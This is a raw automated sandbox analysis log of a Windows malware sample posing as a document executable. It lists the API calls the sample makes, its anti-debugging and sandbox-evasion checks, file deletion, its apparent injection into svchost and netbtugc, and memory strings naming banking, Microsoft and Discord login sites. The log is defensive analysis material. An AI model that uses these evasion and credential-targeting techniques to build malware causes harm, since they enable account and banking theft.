            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932Thread sleep count: 31 > 30Jump to behavior
            Source: C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe TID: 932Thread sleep time: -31000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009ADBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_009ADBBE
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_0097C2A2 FindFirstFileExW,0_2_0097C2A2
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B68EE FindFirstFileW,FindClose,0_2_009B68EE
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_009B698F
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009AD076
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009AD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009AD3A9
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009B9642
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009B979D
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_009B9B2B
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009B5C97 FindFirstFileW,FindNextFileW,FindClose,0_2_009B5C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 10_2_02C1BAB0 FindFirstFileW,FindNextFileW,FindClose,10_2_02C1BAB0
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009442DE
            Source: F56GKLK7U4.10.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: F56GKLK7U4.10.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: F56GKLK7U4.10.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: F56GKLK7U4.10.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: F56GKLK7U4.10.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: firefox.exe, 0000000E.00000002.1687777846.00000276CE5AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk%
            Source: F56GKLK7U4.10.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: F56GKLK7U4.10.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: F56GKLK7U4.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: F56GKLK7U4.10.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: F56GKLK7U4.10.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: F56GKLK7U4.10.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: F56GKLK7U4.10.drBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: F56GKLK7U4.10.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: dZxfFeGGZbzJaFRaN.exe, 0000000C.00000002.3688891608.000000000073F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
            Source: netbtugc.exe, 0000000A.00000002.3689176760.0000000002F6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll|
            Source: F56GKLK7U4.10.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: F56GKLK7U4.10.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: F56GKLK7U4.10.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: F56GKLK7U4.10.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: F56GKLK7U4.10.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: F56GKLK7U4.10.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: F56GKLK7U4.10.drBinary or memory string: global block list test formVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: F56GKLK7U4.10.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: F56GKLK7U4.10.drBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: F56GKLK7U4.10.drBinary or memory string: discord.comVMware20,11696501413f
            Source: F56GKLK7U4.10.drBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0337096E rdtsc 2_2_0337096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417823 LdrLoadDll,2_2_00417823
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009BEAA2 BlockInput,0_2_009BEAA2
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00972622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00972622
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_009442DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009442DE
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_00964CE8 mov eax, dword ptr fs:[00000030h]0_2_00964CE8
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_01BC3550 mov eax, dword ptr fs:[00000030h]0_2_01BC3550
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_01BC34F0 mov eax, dword ptr fs:[00000030h]0_2_01BC34F0
            Source: C:\Users\user\Desktop\Document 151-512024.exeCode function: 0_2_01BC1ED0 mov eax, dword ptr fs:[00000030h]0_2_01BC1ED0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340634F mov eax, dword ptr fs:[00000030h]2_2_0340634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C310 mov ecx, dword ptr fs:[00000030h]2_2_0332C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03350310 mov ecx, dword ptr fs:[00000030h]2_2_03350310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336A30B mov eax, dword ptr fs:[00000030h]2_2_0336A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D437C mov eax, dword ptr fs:[00000030h]2_2_033D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov ecx, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03408324 mov eax, dword ptr fs:[00000030h]2_2_03408324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov ecx, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B035C mov eax, dword ptr fs:[00000030h]2_2_033B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033FA352 mov eax, dword ptr fs:[00000030h]2_2_033FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D8350 mov ecx, dword ptr fs:[00000030h]2_2_033D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B2349 mov eax, dword ptr fs:[00000030h]2_2_033B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03328397 mov eax, dword ptr fs:[00000030h]2_2_03328397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332E388 mov eax, dword ptr fs:[00000030h]2_2_0332E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0335438F mov eax, dword ptr fs:[00000030h]2_2_0335438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0334E3F0 mov eax, dword ptr fs:[00000030h]2_2_0334E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033663FF mov eax, dword ptr fs:[00000030h]2_2_033663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033403E9 mov eax, dword ptr fs:[00000030h]2_2_033403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov ecx, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE3DB mov eax, dword ptr fs:[00000030h]2_2_033DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D43D4 mov eax, dword ptr fs:[00000030h]2_2_033D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC3CD mov eax, dword ptr fs:[00000030h]2_2_033EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A3C0 mov eax, dword ptr fs:[00000030h]2_2_0333A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033383C0 mov eax, dword ptr fs:[00000030h]2_2_033383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332823B mov eax, dword ptr fs:[00000030h]2_2_0332823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0340625D mov eax, dword ptr fs:[00000030h]2_2_0340625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033E0274 mov eax, dword ptr fs:[00000030h]2_2_033E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03334260 mov eax, dword ptr fs:[00000030h]2_2_03334260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332826B mov eax, dword ptr fs:[00000030h]2_2_0332826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A250 mov eax, dword ptr fs:[00000030h]2_2_0332A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336259 mov eax, dword ptr fs:[00000030h]2_2_03336259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EA250 mov eax, dword ptr fs:[00000030h]2_2_033EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov eax, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B8243 mov ecx, dword ptr fs:[00000030h]2_2_033B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402A0 mov eax, dword ptr fs:[00000030h]2_2_033402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034062D6 mov eax, dword ptr fs:[00000030h]2_2_034062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov ecx, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C62A0 mov eax, dword ptr fs:[00000030h]2_2_033C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0336E284 mov eax, dword ptr fs:[00000030h]2_2_0336E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B0283 mov eax, dword ptr fs:[00000030h]2_2_033B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033402E1 mov eax, dword ptr fs:[00000030h]2_2_033402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0333A2C3 mov eax, dword ptr fs:[00000030h]2_2_0333A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03360124 mov eax, dword ptr fs:[00000030h]2_2_03360124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]2_2_03404164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03404164 mov eax, dword ptr fs:[00000030h]2_2_03404164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov ecx, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DA118 mov eax, dword ptr fs:[00000030h]2_2_033DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033F0115 mov eax, dword ptr fs:[00000030h]2_2_033F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov eax, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033DE10E mov ecx, dword ptr fs:[00000030h]2_2_033DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332C156 mov eax, dword ptr fs:[00000030h]2_2_0332C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C8158 mov eax, dword ptr fs:[00000030h]2_2_033C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03336154 mov eax, dword ptr fs:[00000030h]2_2_03336154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov ecx, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033C4144 mov eax, dword ptr fs:[00000030h]2_2_033C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033B019F mov eax, dword ptr fs:[00000030h]2_2_033B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0332A197 mov eax, dword ptr fs:[00000030h]2_2_0332A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034061E5 mov eax, dword ptr fs:[00000030h]2_2_034061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03370185 mov eax, dword ptr fs:[00000030h]2_2_03370185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033EC188 mov eax, dword ptr fs:[00000030h]2_2_033EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033D4180 mov eax, dword ptr fs:[00000030h]2_2_033D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033601F8 mov eax, dword ptr fs:[00000030h]2_2_033601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_033AE1D0 mov eax, dword ptr fs:[00000030h]2_2_033AE1D0
